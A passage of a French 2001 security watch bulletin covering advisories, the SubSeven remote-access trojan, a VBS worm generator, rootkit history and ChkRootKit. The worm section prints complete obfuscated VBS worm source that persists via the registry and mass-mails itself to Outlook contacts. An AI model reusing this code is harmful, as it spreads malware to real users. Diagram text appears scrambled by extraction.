comme cela avait été annoncé dans un rapport écrit dans un premier temps en Tchèque et disponible depuis peu en
Anglais. La version PGP 7.0.3 est vulnérable (cette version a été utilisée par la société ICZ dans le cadre d'une
démonstration). Les autres versions affectées ne sont pas encore toutes connues, les auteurs de l'attaque précisant
qu'il est de la responsabilité des éditeurs de vérifier la vulnérabilité de leurs produits.
ftp://ftp.iks-jena.de/mitarb/lutz/crypt/software/pgp/pgp263in/
http://www.icz.cz/en/pdf/openPGP_attack_ENGvktr.pdfhttp://www.icz.cz/en/onas/ohlasy.html
http://www.icz.cz/pdf/pgp/OpenPGP_Attack_ENGfinal.ppt
TIS
Correctifs pour Gauntlet 5.5
TIS publie deux correctifs 'cluster' (PatchLevel 11) pour Gauntlet 5.5. 'cluster.HPUX.patch' 'cluster.SOLARIS.patch'
Ils résolvent des problèmes liés à la gestion des délais et de terminaison des processus dans HTTP, FTP et PLUG.
ftp://ftp.tis.com/gauntlet/patches/5.5/
Page 37/51
Mars 2001
VIRUS
Infection par les 'vCards'
Suite à la faille découverte dans les applications telles que Microsoft Outlook, utilisant les 'vCards' , NAI/McAFEE
nous informe de la possibilité de recevoir des 'vCards' mal formées exploitant cette vulnérabilité. Ainsi il est
recommandé de ne pas ouvrir ces fichiers, reconnaissables par leur extension '.vcf'. La méthode de propagation
constitue une nouvelle voie de contamination, même s'il ne s'agit pas, à proprement parler, de virus.
http://vil.nai.com/villib/dispvirus.asp?virus_k=99020
CODES D'EXPLOITATION
Les codes d'exploitation des vulnérabilités suivantes ont fait l'objet d'une large diffusion:
ATSTAKE
Détail et code d'exploitation via les 'vCards'
@Stake publie un code d'exploitation ainsi que le détail de la vulnérabilité affectant Microsoft Outlook lors de
l'utilisation de 'vCards' mal formées .
http://www.atstake.com/research/advisories/2001/index.html#022301-1
BULLETINS ET NOTES
Les bulletins d’information suivants ont été publiés par les organismes officiels de surveillance et les
éditeurs:
AusCERT
Reprise de l'avis NIPC [00-060]
L'AusCERT a repris, sous la référence AL-2001.02, l'avis NIPC [00-060] au sujet des nombreuses attaques contre
des sites de e-commerce. Les environnements Microsoft étaient mis en cause dans ce dernier avis.
ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-2001.02
AXENT
Mise à jour de 'NetRecon 3.0' (SU12)
La mise à jour de 'NetRecon 3.0' (SU12) permet maintenant de vérifier les récentes vulnérabilités découvertes dans
'BIND' et 'SSH'. De plus amples détails sont fournis dans la note de mise à jour.
http://www2.axent.com/swat/index.cfm?Doc=2001_02_27
CERT
Emission de faux certificats 'Microsoft Corporation'
Le CERT publie, sous la référence CA-2001-04, son propre bulletin qui vient compléter l'avis Microsoft MS01-017 au
sujet de l'émission de faux certificats 'Microsoft Corporation'. Il référence pour consultation le site 'VeriSign'
http://www.verisign.com/developer/notice/authenticode/index.html ainsi que la liste mise à jour des certificats
révoqués http://crl.verisign.com/Class3SoftwarePublishers.crl Le bulletin est aussi disponible via FedCIRC sous la
référence FA-2001-04 http://www2.fedcirc.gov/advisories/FA-2001-04.html
http://www.cert.org/advisories/CA-2001-04.html
Le ver 'Hybris' véhiculé par les 'open mail relays'
Dans sa note d'informations IN-2001-02, le CERT nous informe que le ver 'Hybris' doit sa récente réapparition à
l'utilisation abusive des relais de courriers électroniques. Il est possible que les serveurs de mails d'une entreprise
soient en 'open relay' sans que celle-ci en ait connaissance. L'impact direct est l'utilisation de la bande passante par
par un tiers ainsi que le 'black-listage' qui peut nuire à l'image de marque de l'entreprise.
http://www.cert.org/incident_notes/IN-2001-02.html
ISS
Disponibilité de la mise à jour NS MU 2.2
La mise à jour corrigeant la faille de sécurité pouvant être exploitée dans ISS RealSecure Network Sensor via l'outil
'stick' est disponible.
http://www.iss.net/db_data/xpu/RS.phphttp://www.iss.net/db_data/xpu/RSNS%20MU%202.2.php
Mise à jour 4.8 pour 'Internet Scanner'
La mise à jour 4.8 pour 'Internet Scanner' inclut la vérification de 19 nouvelles vulnérabilités dont 'LPRng' utilisée
par le virus 'Ramen'.
http://www.iss.net/db_data/xpu/IS4.8.php
Mise à jour pour 'Internet Scanner'
ISS a publié la mise à jour X-Press Update 4.7 pour son scanner de vulnérabilités 'Internet Scanner'. Cette mise à
jour intègre 25 nouveaux tests dont plusieurs portes dérobées ainsi que les récentes vulnérabilités affectant
DNS/BIND et WatchGuard SOHO.
http://www.iss.net/db_data/xpu/IS4.7.php
Page 38/51
Mars 2001
NIPC
Vulnérabilité des systèmes de détection d'intrusions
Dans son bulletin 01-004, le NIPC informe les utilisateurs de systèmes de détection d'intrusions (IDS) que ceux-ci
sont vulnérables à des attaques de type 'false positive', qui consiste à générer un grand nombre d'attaques
mineures dans le but de surcharger l'IDS afin de pouvoir réellement attaquer ce dernier. Cette note est à mettre en
relation avec l'alerte 'ISS' au sujet de l'outil d'attaque surnommé 'stick'.
http://www.nipc.gov/warnings/assessments/2001/01-004.htm
SYMANTEC
Notification de virus et de signatures via 'SMS'
La société Symantec, spécialisée dans les anti-virus, propose à ses clients 'Platinum' (et bientôt 'Gold') des EtatsUnis et d'Europe un service de notification d'alertes via les messages 'SMS' (Short Message Service). Ces messages,
à destination des téléphones mobiles, alerteront les clients de l'apparition virus ainsi que de la disponibilité des
signatures associées.
http://www.cnn.com/2001/TECH/internet/03/01/symantec.SMS.idg/index.html
Page 39/51
Mars 2001
ATTAQUES
OUTILS
SUBSEVEN V2.2 Description
Proxy
Socks
Parmi tous les chevaux de Troie ayant fait l'objet d'une campagne médiatique, tels BO, BO2K,
Socket23 ou encore Master Paradise, SubSeven est probablement le seul à avoir subit autant
d'évolutions et à être resté aussi longtemps en tête du hit-parade des outils de 'hacking'. Notons que le
site WEB 'officiel' annonce 2.3 millions de visites depuis le 7 mars 1999, date de publication de la
première version, chiffre qu'il n'y a probablement pas lieu de mettre en doute.
SubSeven reste à ce jour, l'outil de prise de contrôle à distance (ou RAT Remote Access Tools) offrant la plus
grande palette de fonctions.
Le principe fonctionnement de SubSeven2.2 est schématiquement rappelé sur le synoptique suivant:
1. L'utilitaire 'EditServer' permet de générer un Poste
Server.exe
Préparation
exécutable contenant un serveur SubSeven
Paramètres:
- Installation
autonome et pré-configuré.
EditServer
- Accès Réseau
EditServer
- Notification
2. Le lancement de cet exécutable installe le
- ...
serveur sur le machine cible en utilisant l'une
Cible.exe
Cible.exe
des 7 méthodes proposées dans l'option
Redémarrage
Cible.exe
Cible.exe
'Startup Method' de l'utilitaire EditServer.
WEB
Update
PlugIns
3. Le serveur notifie son démarrage et transmet
les paramètres de connexion sur les canaux
Subseven.cgi
Subseven.cgi
actifs parmi les 5 canaux définis via l'option
Notifications
'Notification' de l'utilitaire EditServer.
Serveur
Serveur
Notons la présence d'une option de Poste
Console
notification directe à destination d'un service
Paramètres:
Sin.exe
Sin.exe
- N° de port
statique, dit SIN, défini par un couple
CIBLE
Notifications
adresse IP/Numéro de port TCP. Les autres
Directe
IRC/ICQ/MAIL
mécanismes utilisent sur un canal indirect
IRC/ICQ/MAIL
S
Do
offert par les services ICQ, IRC, Mail ou
Commandes
Sub7.exe
Sub7.exe
encore WEB via l'appel d'un CGI-BIN dédié.
4. L'utilisateur peut alors prendre le contrôle du
système sur lequel un serveur est actif par le
biais
d'une
connexion
TCP
chiffrée
CIBLES
Indirectes
éventuellement établie sur un tunnel SOCKS.
La version 2.2 est distribuée sous la forme d'un paquetage de 2.9Mo dénommé 'ss22.zip' et destiné à être
décompressé dans le répertoire de travail de SubSeven. Ce paquetage contient 5 répertoires, quelques fichiers de
configuration et les 4 exécutables suivants:
- EditServer.exe, l'utilitaire permettant de générer un serveur SubSeven autonome, configuré en fonction des
besoins de l'utilisateur et lié à un ou plusieurs fichiers. Lors de son exécution, le fichier généré peut ainsi
automatiquement extraire puis éventuellement exécuter les fichiers liés. Cette technique permet d'éviter d'avoir à
recourir à un 'binder' ou à un 'wrapper' externe pour insérer le serveur (la charge) dans un autre exécutable (le
cheval de Troie).
- Serveur.exe, le modèle de serveur (ou STUB) utilisé par EditServer pour générer le serveur définitif. Le très
faible encombrement de ce STUB - 55Ko compressé par l'utilitaire UPX - facilite son intégration dans un programme
tiers et sa transmission par un support limité en volume tel que la messagerie.
- Sub7.exe, le programme graphique permettant de rechercher et de prendre le contrôle des systèmes sur lesquels
le serveur SubSeven est actif.
- Sin.exe, un programme de notification minimaliste (Static Ip Notifier) destiné à être exécuté sur le poste de
contrôle et permettant d'être informé en temps réel de l'état des serveurs installés sur les cibles lorsque ceux-ci ont
été générés avec l'option de notification correspondante. Ce programme s'installe dans la barre d'outil et permet
d'initialiser le client Sub7 d'un simple clic sur l'icône correspondant à un serveur actif.
© 2001 APOGEE Communications
SubSeven, conçu comme un programme modulaire et évolutif, fait appel à des
fonctionnalités contenues dans des modules - ou PlugIns - chargés à la volée depuis la
console ou à partir d'un site externe référencé par une URL. En pratique, ces modules
prennent la forme de librairies dynamiques et sont sauvegardés dans le répertoire
d'installation du serveur SubSeven.
La distribution par défaut contient les 13 modules suivant aisément identifiables car sauvegardés sous le nom original:
Page 40/51
Mars 2001
- s7advanced.dll 'Advanced'
- s7capture.dll
'Fun Manager'/'WebCam'
- s7fun1.dll
'Fun manager'
- s7fun2.dll
'Fun other'
- s7keys.dll
'Keys/Messages'
- s7moreinfo.dll
'Connection'/'MorePCInfo'
- s7password.dll 'Advanced'/'Passwords'
- s7scanner.dll
'Connection'/'Scanner'/'Remote'
- s7sniffer.dll
'Advanced'/'packet sniffer'
- s7takeover.dll
'Keys/messages'/'ICQTakeover'
- icqpwsteal.dll
'Advanced/Passwords'/'IcQPassword'
- matrix.dll
'Realistic Matrix'
- zpacket.vxd
packet32.dll
'Advanced'/'packet sniffer'.
Nota: La chaîne "Packet VxD for Microsoft
Windows 95" contenue dans le fichier
'zpacket.vxd' peut expliquer les
dysfonctionnements constatés sous NT !
La distribution de base de SubSeven propose ainsi quelques 41 fonctions permettant l'acquisition et la manipulations
des ressources du système cible dont en particulier: (le symbole désigne ici une fonctionnalité apparue avec la version 2.2)
- l'identification du système cible,
le sondage déporté de services TCP/IP,
- l'enregistrement des séquences de touches,
- la génération de faux messages systèmes,
- l'interception des échanges chat ICQ, MSN, AIM et YAHOO,
- le transfert de données via un mini-serveur ftp intégré,
- la recherche de fichiers sur le serveur,
l'acquisition et le transfert en UDP des paquet réseaux,
- l'acquisition des mots de passe,ICQ, RAS, AIM et autres,
- un éditeur de registry distant,
l'accès à un explorateur de réseau distant,
- l'accès à un gestionnaire de processus distant,
- l'accès à un gestionnaire de fichier,
- l'accès à un gestionnaire de fenêtre,
l'accès au gestionnaire d'impression,
- l'accès au presse-papier,
- un redirecteur d'application et de services autorisant le rebond,
un netstat distant,
- et enfin, la manipulation de diverses ressources matérielles et
logicielles dont la souris, l'écran, la carte son, la Webcam, le
clavier, le navigateur web, …
Le serveur peut être configuré pour retransmettre les données collectées en temps différé vers une adresse de
messagerie (cas de mots de passe et des séquences de touches) ou en temps réel vers une adresse IP et numéro de
port UDP (cas des paquets réseaux acquis par le 'sniffer'). Deux options de paramétrage permettent d'accroître la
furtivité du serveur: le tirage aléatoire du numéro de port TCP utilisé - celui-ci est transmis sur les canaux de
notification sélectionnés - et la modification du nom du fichier contenant le serveur lors de chaque réinitialisation du
système hôte.
Notons que la fonctionnalité 'IrcBot' - permettant au serveur de s'auto-attacher à un canal IRC et de se comporter
comme un robot (bot) - semble avoir disparue interdisant le pilotage du serveur via IRC. L'auteur de SubSeven
annonce cependant qu'une nouvelle version devrait voir le jour sous peu qui corrigera divers problèmes et intégrera
l'ensemble des plugins des versions précédentes mais aussi un client LINUX.
Les tests que nous avons pu mener sur cette version prouvent que la notoriété de SubSeven ne s'éteindra pas de
sitôt malgré les quelques dysfonctionnements constatés en environnement NT. A ce propos, bien que le serveur de la
version 2.2 soit annoncé compatible Windows NT et 2000 contrairement aux versions précédentes, de nombreuses
fonctions - trop proches du matériels ou sécurisées - restent inopérantes: sniffer, process manager, text2speech, …
A n'en pas douter, la compatibilité Windows NT et 2000 représente à ce jour la plus grande menace.
Bien entendu, cet outil peut faire l'objet de tests sous réserve de respecter les règles élémentaires de sécurité en
installant celui-ci dans un environnement autonome, non connecté aux réseaux de l'entreprise. Un conseil: l'option
ONLINE passée en argument de l'exécutable contenant le serveur permet d'initialiser celui-ci en l'absence de
connexion au réseau. Il est alors possible de tester SubSeven sur un poste isolé en utilisant l'adresse locale 127.0.0.1.
Pour en savoir plus, le lecteur se reportera à la FAQ proposée par le site officiel de SubSeven mais surtout au(x)
remarquable(s) guide(s) disponible(s) sur le site 'Dark-Creation'.
Le site TLSecurity sur lequel peut aussi être téléchargé SubSeven2.2 propose aussi une page détaillant plusieurs
Page 41/51
Mars 2001
techniques de détection et d'éradication pouvant être exploitées avec succès en cas de suspicion d'infection, ou
d'infection avérée. Notons qu'outre la présence des 'plugins' dans le répertoire système, SubSeven laisse une trace
sous la forme de fichiers temporaires ayant un nom aléatoire au format 7.3 constitué de caractères alphabétiques:
vfklmgb.yyc, gttgawe.yyc, ...
http://www.sub7files.com/download/index.shtml
http://www.dark-creation.net/azzazzin/subseven/newwindow.htm
http://www.sub7files.com/faq/general.shtm
http://subseven.slak.org
VBS WORM GENERATOR Description
L'époque où le simple fait d'annoncer l'existence d'un nouveau virus était un véritable événement faisant la Une de la
presse médiatique est révolue. Désormais, pour avoir une chance de connaître la gloire dans un monde où quelques
dizaines de nouveaux virus sont découverts chaque semaine, un virus doit impérativement respecter certaines règles
techniques mais aussi 'commerciales' dont notamment:
1. Porter un nom facile à mémoriser: tout le monde se souvient des Stone, Tequila, IloveYou ou
AnnaKournikova mais qui se souvient encore des Melissa, BubbleBoy, Kak, CAP, Filer, 1800, et autres virus
anonymes ayant pourtant eu, pour certains, une capacité de frappe supérieure,
2. Utiliser un vecteur médiatique: la combinaison Internet (transport) / VBS
(langage) / OutLook (application) est actuellement l'une des valeurs les plus sures
dont l'efficacité est avérée. Ces trois termes agissent dans l'esprit du public comme
précurseurs d'une catastrophe similaire à celle provoquée par la (fausse)
'Référence', IloveYou,
3. Favoriser la propagation: au risque d'être plus rapidement découvert, un virus s'il
veut être médiatisé devra favoriser sa duplication quitte à ne transporter aucune
charge destructrice, tel Anna Kournikova, ce qui, effet corollaire intéressant, peut
aussi conduire à diminuer la peine encourue par l'auteur dans certains pays.
4. Revendiquer une paternité: toute référence à un virus ayant été médiatisé
simplifiera le travail du journaliste. Ainsi, il sera opportun de revendiquer une
évolution, modification ou appartenance à une 'école' telle que celles de l'Europe
de l'Est: Bulgarie, Russie ou de l'Amérique du Sud: Argentine (dont un
emblème est présenté ci-contre), Brésil.
Les amateurs à la recherche d'une gloire éphémère et facile retrouveront dans le générateur de Virus* 'Vbs Worms
Generator' créé par [K]Alamar - un argentin - tous les ingrédients nécessaires à la réalisation d'un VIRUS
respectant les principes précédemment énoncés.
Le résultat est garanti puisque l'auteur du
fameux ANNA KOURNIKOVA a reconnu
avoir utilisé ce générateur de virus !
L'effet de cette annonce semble avoir été
immédiat car les quelques sites proposant
ce générateur ont été rapidement saturés
de connexions comme l'annonce le
WebMaster de l'un de ces sites:
"During the last three days thousands of
people all around the world have
download the [K]Alamar's worm generator
from __ _____. The server is overloaded
now with the huge amount of requests
and what we should expect ? Yes, the
second wave of the worm. I think it will
be so. It is new situation for me and I ask
myself again and again do the people
think about consequnces of their actions ?
"
Notons à ce propos, que cet utilitaire n'est
qu'un générateur parmi les quelques 54
générateurs disponibles sur un site dédié
dont une copie de la page de présentation
est proposée ci-contre.
Rappelons aussi que l'annonce de la disponibilité du ' Senna Spy Trojan Generator ' (dont l'auteur est Brésilien) en
Juillet 2000, avait aussi provoqué une ruée sur le site 'sennaspy.8m.com' désormais clos.
Nous tenons à préciser que l'objectif de l'analyse qui va suivre n'est pas d'inciter le lecteur à utiliser cet outil mais au
contraire de détailler son fonctionnement pas à pas afin de l'informer en lui évitant des manipulations hasardeuses et
Page 42/51
Mars 2001
risquées.
Le fonctionnement du 'Vbs Worms Generator' ou 'Vbs WG' mérite d'être présenté
étant donnée son extrême simplicité. La version 2.0 qui date du 9 Mars 2001 est
annoncée comme résultant d'une réécriture complète de la version 1.5 publiée en
Août 2000.
Cette dernière, écrite en VB5, générait un virus à partir de la concaténation et du
paramétrage de fichiers modèles contenant les fonctions VBS d'initialisation,
d'infection des environnements pIrch, mIrc et Outlook et de recopie du virus.
La version 2.0 n'offre 'hélas' plus aucun accès aux sources du code VBS. Notons la
présence dans la distribution d'un fichier d'aide bien documenté mais ne décrivant pas
les modèles de fonctions utilisés.
Une rapide inspection de l'exécutable permet cependant de mettre en évidence le
code VBS source. Celui-ci peut alors être facilement extrait pour analyse détaillée. Il
apparaît que le code VBS utilisé diffère peu de celui de la version précédente.
La génération d'un Virus est effectuée ainsi en moins d'une minute et en 9 étapes détaillées "par l'image" ci-après:
1.
2.
3.
Sélection du mode d'initialisation du
virus une fois installé sur un
système infecté
Paramétrage du nom du virus et
d'informations contextuelles diverse
Paramétrage du sujet et contenu
du mail envoyé à la victime
4.
5.
6.
Sélection des cibles à infecter
7.
Configuration des options
concernant IRC
Définition de la charge
Sélection des modes de protection
et de dissimulation
Page 43/51
Mars 2001
8.
9.
'Signature' d'une décharge de responsabilité
et génération ….
Bien que concis, le code généré est obscurci par l'utilisation d'un technique de modification dynamique du nom des
objets et fonctions ayant pour but de complexifier la détection par un algorithme de recherche de signatures statiques.
Le code produit reste bien moins performant que ceux générés par la version 1.5 (gestion de pIrch) ou utilisés par
Melissa et IloveYou (l'option 'Infect File' n'a pas été activée afin de générer un virus non virulent similaire à 'Anna
Kournikova').
'Vbs.Vbswg.My Own WORM Created By The Security Watcher. 3/14/2001
Set T80563H8 = createobject("scripting.filesystemobject")
GPN44J3E = T80563H8.getspecialfolder(2)
ON693784 = GPN44J3E & "\Vbswg_Worm.jpg.vbs"
Set RNIDQGGT = createobject("wscript.shell")
RNIDQGGT.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & ON693784 & " %"
T80563H8.copyfile wscript.scriptfullname, ON693784
If RNIDQGGT.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\My Own WORM\L3RL1Q6M") <> 1 then
M0L6E463
End if
If RNIDQGGT.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\My Own WORM\CR6S42U9") <> 1 then
Q2O11C14 ""
End if
Function M0L6E463()
Set V1MFJ7RV = CreateObject("Outlook.Application")
If V1MFJ7RV = "Outlook" Then
Set G8T6N4QB = V1MFJ7RV.GetNameSpace("MAPI")
Set D66V4MVA = G8T6N4QB.AddressLists
For Each D33CR984 In D66V4MVA
If D33CR984.AddressEntries.Count <> 0 Then
OT2617EI = D33CR984.AddressEntries.Count
For AEA6513R = 1 To OT2617EI
Set E5TIP237 = V1MFJ7RV.CreateItem(0)
Set F4TST814 = D33CR984.AddressEntries(AEA6513R)
E5TIP237.To = F4TST814.Address
E5TIP237.Subject = "Very Important!"
E5TIP237.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
Execute "set B04B978R=E5TIP237."&Chr(65)&Chr(116)&Chr(116)&Chr(97)&Chr(99)&Chr(104)&Chr(109)&Chr(101)&Chr(110)&Chr(116)&Chr(115)
O4VI6017 = ON693784
E5TIP237.DeleteAfterSubmit = True
B04B978R.Add O4VI6017
If E5TIP237.To <> "" Then
E5TIP237.Send
End If
Next
End If
Next
End If
End function
Function Q2O11C14(T3JO3787)
If T3JO3787 <> "" Then
L2168MPK = RNIDQGGT.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If T80563H8.fileexists("c:\mirc\mirc.ini") Then
T3JO3787 = "c:\mirc"
ElseIf T80563H8.fileexists("c:\mirc32\mirc.ini") Then
T3JO3787 = "c:\mirc32"
ElseIf T80563H8.fileexists(L2168MPK & "\mirc\mirc.ini") Then
T3JO3787 = L2168MPK & "\mirc"
ElseIf T80563H8.fileexists(L2168MPK & "\mirc32\mirc.ini") Then
T3JO3787 = L2168MPK & "\mirc"
Else
T3JO3787 = ""
End If
End If
If T3JO3787 <> "" Then
Set I986TV5R = T80563H8.CreateTextFile(T3JO3787 & "\script.ini", True)
I986TV5R = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
I986TV5R = I986TV5R & vbCrLf & "n0=on 1:JOIN:#:{"
I986TV5R = I986TV5R & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
I986TV5R = I986TV5R & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
I986TV5R = I986TV5R & ON693784
I986TV5R = I986TV5R & vbCrLf & "n3=}"
script.Close
End If
End Function
'Vbswg 2 Beta. By [K]
Le fonctionnement du virus généré est très classique:
1. Transmission du code dans un fichier attaché à un courrier à l'ensemble des adresses contenu dans le carnet
d'adresse. Selon les options utilisées dans le générateur, et la configuration du client de messagerie des
destinataires, le code attaché peut être exécuté sur ouverture explicite de l'attachement ou simple visualisation du
Page 44/51
Mars 2001
corps du message. Le nom 'attachments' est lui-même masqué (cf [1]),
Réplication du code via la fonction DCC send si l'application mIrc est présente. Le nom 'dcc' est lui aussi masqué
(cf [2]),
3. Ecrasement du contenu des fichiers ayant pour extension 'vbe' ou 'vbs' par le code du virus, un parcours exhaustif
de tous les volumes (y compris les partages réseau) étant effectué.
Est-il utile de rappeler, après une telle démonstration, la nécessité d'installer - et de maintenir à jour - sur tous les
postes et points critiques du système d'information des dispositifs de détection et d'éradication tels qu'anti-virus ou
sondes d'analyse de signature ?
* Au risque d'aller à l'encontre des définitions actuellement usités, nous considérons qu'un 'vers' / 'worm' est un code autonome et
2.
susceptible de se déplacer par ses propres moyens sans requérir l'intervention d'un utilisateur. Les codes dont il est question ici
nécessitent une action préalable de l'utilisateur. Mais tout ceci n'est qu'une affaire de convention …
http://vx.netlux.org/dat/vct.shtml
http://vx.netlux.org/dat/tv07.shtml
http://www.securax.org/data/vbswg150b.zip
http://www.kvirii.com.ar/
CHKROOTKIT
Description
'ChkRootKit' est un utilitaire destiné à contrôler l'absence (ou la présence !) d'un 'rootkit' sur un système UNIX.
Avant de détailler le fonctionnement de cet utilitaire, il peut être utile de donner notre définition du 'rootkit' et d'en
rappeler la genèse:
Un 'rootkit' est une collection, organisée et prête à l'emploi, d'utilitaires permettant d'ouvrir, et de
conserver, un accès masqué sur un compte unix disposant de privilèges étendus, ceux de 'root' en général.
Bien que les techniques élémentaires de dissimulation et de masquages utilisées dans les 'rootkits' aient fait l'objet
de multiples articles publiés dés 1986, le terme 'rootkit' n'est réellement apparu qu'au milieu des années 90.
Jusqu'alors, les pirates disposaient de leurs propres boites à outils laborieusement assemblées et jalousement
défendues. En effet, rares étaient les systèmes d'exploitation accessibles à tout un chacun en dehors des systèmes de
type BSD et dérivés - SunOS par exemple - dont les sources étaient assez facilement disponibles dans le milieux
universitaire. Ainsi, les premiers composants des futurs 'rootkits' firent leur apparition en environnement BSD4.x
puis SunOS.
Citons à titre d'exemple, les deux articles de fond publiés dans le célèbre magazine 'PHRACK':
Unix Cracking Tips (Phrack Vol. 3 / Num. 25 / Art. 5 en date du 17 Mars 1989) ou comment manipuler le
noyaux UNIX afin de détourner, voire d'ajouter, certains appels systèmes en environnement BSD.
Hidding Out Under UNIX (Phrack Vol. 3 / Num. 25 / Art. 6 en date du 25 Mars 1989) ou comment manipuler le
contenu du fichier /etc/utmp en environnement BSD et Systeme V afin de masquer toute trace des connexions
console.
Il est possible d'affirmer, avec le recul, que le numéro 25 de PHRACK Magazine marque l'apparition (pour ne pas
dire "est à l'origine") d'une nouvelle ère en dévoilant des techniques de manipulations performantes, et jusqu'alors
totalement confidentielles, auprès d'un large public (pour l'époque).
Il faudra cependant attendre encore cinq ans, et l'article 'The Fingerd Trojan' (Phrack Vol. 5 / Num. 46 / Art. 1 en
date du 20 Septembre 1994), pour voir apparaître la technique consistant à modifier - patcher - les sources d'un
service, ici 'finger', dans l'optique de lui adjoindre une porte dérobée.
Tous les éléments sont alors réunis pour favoriser l'éclosion de boites à outils prêtes à l'emploi:
- les techniques élémentaires sont désormais connues, les composants logiciels sont développés sous la forme de
modules facilement adaptables grâce aux outils GNU,
- un réseau de communication dénommé Internet ouvert et performant est désormais accessible qui autorise non
seulement l'échange de données mais aussi l'ouverture programmable de connexions en temps réel,
- les sources de systèmes d'exploitation 'universitaires' sont accessibles à tous, SUN annonce la mise à disposition
gracieuse de la version X86 de son nouveau système Solaris, Linus Torvald relève le défi de créer un système
d'exploitation totalement libre: LINUX.
Le résultat ne se fait pas attendre, entre 1995 et 2001, plus de trente paquetages de type 'rootkit' sont diffusés et
fonctionnels en majorité dans l'environnement LINUX mais aussi sous Solaris et FreeBSD.
En 1996, un paquetage réunissant toutes les caractéristiques attendues d'un 'rootkit' est rendu publique. Ce
paquetage dénommé 'LRK V3' - pour Linux Root Kit - fera l'objet de trois évolutions successives, la version 'LRK
V5' publiée fin 1999 atteignant un degré de sophistication rarement atteint: 18 utilitaires classiques modifiés - dont
chfn, chsh, du, find, ifconfig, inetd, killall, login, netstat, passwd, pidof, ps, rshd, syslogd, tcpd et top - et 6
outils spécifiques.
En 1997, deux articles détaillant une technique de manipulation dynamique des librairies partagées sont publiés dans
PHRACK sous les titres évocateurs de 'Shared Library Redirection' (Phrack Vol. 7 / Num. 51 / Art. 8 en date du 01
Septembre 1989) et 'Bypassing Integrity Checking Systems' (Phrack Vol. 7 / Num. 25 / Art. 9 en date du 01
Septembre 1989).
Combiné avec le mécanisme de chargement des modules, présents notamment en environnement Solaris et Linux,
Page 45/51
Mars 2001
cette technique autorise la création d'un nouveau type de 'rootkit' plus efficace dans lequel la fonction de
dissimulation est codée au niveau du noyau, et non plus dans chaque utilitaire.
En 1999, un nouvel article de Phrack, 'A *REAL* NT Rootkit, patching the NT Kernel' (Phrack Vol. 9 / Num. 55 /
Art. 5 en date du 09 Septembre 1999), détaille la technique permettant de manipuler le noyau du système
d'exploitation NT afin d'y installer un 'rootkit'.
Enfin, à la veille du passage en l'an 2000, l'existence des 'rootkits' est enfin dévoilée au grand public par un article
de Dave Dittrich, un universitaire collaborant à l'initiative de sécurité mise en place par le SANS. Depuis, plusieurs
autres paquetages aussi performants que le 'LRK' ont été diffusés dont notamment 't0rnKit' et 'adore' …
La version actuelle de l'utilitaire 'ChkRootKit' autorise la détection des six principaux 'rootkits' dans leur forme
originale:
1. LRK (3, 4 et 5)
2. Solaris Rootkit
3. FreeBSD Rootkit
4. T0rn
5. ARK (Ambient Rootkit)
6. Ramen (cf notre rapport de veille N°30 du mois de Janvier)
La technique d'analyse employée bien que triviale donnera de d'excellents résultats sur les distributions non
modifiées. Elle consiste à:
- rechercher une signature de la présence d'un 'rootkit' dans les utilitaires connus pour être modifiés,
- tester la présence d'un shell interactif sur les ports TCP/31337, TCP/511, TCP/47017, TCP/27374
- contrôler le mode de fonctionnement de l'adaptateur réseau
- vérifier l'absence de manipulation des fichiers lastlog et wtmp.
Notons cependant que les sources des 'rootkit' testés étant toutes accessibles, la modification des signatures
spécifiques des différents utilitaires sera aisée mettant en défaut les résultats de l'analyse effectuée par
'ChkRootKit'.
Ainsi, et à titre d'exemple, le 'rootkit' LRK utilise les fichiers /dev/ptyp, /dev/ptyq, /dev/ptyr et /dev/ptrys
pour stocker les paramètres de configuration et de fonctionnement. L'utilitaire 'ChkRootKit' recherche donc la
présence de l'une de ces chaînes dans les exécutables distribués avec ce rootkit au moyen de l'expression régulière
'/dev/pty[pqrs]', la signature du 'rootkit' LRK. En pratique, les noms de ces fichiers étant définis dans le fichier de
configuration 'rootkit.h' (constantes ROOTKIT_PROCESS_FILE, ROOTKIT_ADDRESS_FILE, ROOTKIT_FILES_FILE et
ROOTKIT_FILES_FILE), une simple recompilation de la distribution avec d'autres valeurs permet d'échapper à la
détection.
Bien qu'imparfait, l'utilitaire 'ChkRootKit' a le mérite d'exister. Il vient en complément d'un outil de signature, tel
TripWire, dont l'utilité n'est plus à rappeler.
Attention cependant, certains 'rootkits' tel Knark s'installent en tant que modules du noyau UNIX (LKM) et
détournent les appels systèmes. Ils peuvent ainsi éviter la détection de modification en masquant les altérations lors
d'un appel système 'normal'. Notons que ces techniques sont utilisées depuis longtemps par les Virus dits 'Stealth'.
'ChkRootKit' fonctionne dans environnements LINUX 2.0.x, 2.2.x, FreeBSD 2.2.x, 3.x et 4.0, OpenBSD 2.6, 2.7 et
2.8, Solaris 2.5.1, 2.6 et 8.0.
http://www.chkrootkit.org/
http://packetstorm.securify.com/UNIX/penetration/rootkits/
TRIANGLE BOY DEVOILE
Description
Notre rapport précédent annonçait la prochaine mise à disposition d'un utilitaire permettant de masquer totalement
l'origine des connexions WEB et de contourner le filtrage d'accès à certains 'anonymiseurs WEB' dont SafeWeb.
Triangle Boy est désormais disponible gratuitement en version 'béta', version ne fonctionnant actuellement qu'en
environnement LINUX.
L'architecture de cet utilitaire largement détaillée sur le site de l'éditeur SAFEWEB est étonnante. Le mécanisme de
contournement des dispositifs de filtrage/blocage d'URL proposé risque de poser, à terme, de sérieux problèmes de
sécurité.
Comme nous l'avions supposé, l'architecture Triangle Boy - ou Tboy - s'appuie sur un mécanisme de tunnel SSL
(dissimulation du contenu) et un premier relayage assuré par un système tiers (masquage de la cible réelle).
La réelle nouveauté consiste en l'utilisation d'un second système de relayage - le troisième larron si l'on compte le
système source - exécutant l'utilitaire Triangle Boy.
Page 46/51
Mars 2001
Un flux de donnée triangulaire peut ainsi
être établi qui autorise une différentiation
Poste
Poste
Client
Client
entre le chemin emprunté par la requête et
celui emprunté par la réponse.
Ici, le relais Tboy n'assure qu'une simple
fonction de retransmission de la requête
Dispositif
